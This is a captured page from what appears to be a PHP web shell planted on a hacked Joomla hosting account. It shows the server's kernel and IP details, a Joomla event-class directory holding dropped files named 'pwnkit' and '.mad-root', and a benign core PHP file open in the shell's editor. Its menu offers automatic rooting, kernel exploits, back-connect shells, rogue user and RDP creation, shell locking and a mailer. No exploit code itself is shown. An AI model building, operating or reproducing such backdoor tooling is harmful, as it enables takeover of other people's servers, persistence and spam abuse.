Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
Event /
Table /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
AbstractEvent.php
1.42
KB
-rw----r--
AfterBindEvent.php
398
B
-rw----r--
AfterCheckinEvent.php
407
B
-rw----r--
AfterCheckoutEvent.php
410
B
-rw----r--
AfterDeleteEvent.php
990
B
-rw----r--
AfterHitEvent.php
399
B
-rw----r--
AfterLoadEvent.php
1.88
KB
-rw----r--
AfterMoveEvent.php
2.72
KB
-rw----r--
AfterPublishEvent.php
407
B
-rw----r--
AfterReorderEvent.php
1.6
KB
-rw----r--
AfterResetEvent.php
398
B
-rw----r--
AfterStoreEvent.php
1.25
KB
-rw----r--
BeforeBindEvent.php
2.08
KB
-rw----r--
BeforeCheckinEvent.php
1003
B
-rw----r--
BeforeCheckoutEvent.php
1.6
KB
-rw----r--
BeforeDeleteEvent.php
990
B
-rw----r--
BeforeHitEvent.php
401
B
-rw----r--
BeforeLoadEvent.php
1.44
KB
-rw----r--
BeforeMoveEvent.php
2.75
KB
-rw----r--
BeforePublishEvent.php
2.61
KB
-rw----r--
BeforeReorderEvent.php
2.2
KB
-rw----r--
BeforeResetEvent.php
400
B
-rw----r--
BeforeStoreEvent.php
1.44
KB
-rw----r--
CheckEvent.php
389
B
-rw----r--
ObjectCreateEvent.php
402
B
-rw----r--
SetNewTagsEvent.php
1.58
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractEvent.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2016 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE */ namespace Joomla\CMS\Event\Table; \defined('JPATH_PLATFORM') or die; use BadMethodCallException; use Joomla\CMS\Event\AbstractImmutableEvent; use JTableInterface; /** * Event class for JTable's events * * @since 4.0.0 */ abstract class AbstractEvent extends AbstractImmutableEvent { /** * Constructor. * * @param string $name The event name. * @param array $arguments The event arguments. * * @throws BadMethodCallException * * @since 1.0 */ public function __construct($name, array $arguments = array()) { if (!\array_key_exists('subject', $arguments)) { throw new BadMethodCallException("Argument 'subject' of event {$this->name} is required but has not been provided"); } parent::__construct($name, $arguments); } /** * Setter for the subject argument * * @param JTableInterface $value The value to set * * @return JTableInterface * * @throws BadMethodCallException if the argument is not of the expected type */ protected function setSubject($value) { if (!\is_object($value) || !($value instanceof JTableInterface)) { throw new BadMethodCallException("Argument 'subject' of event {$this->name} is not of the expected type"); } return $value; } }
Close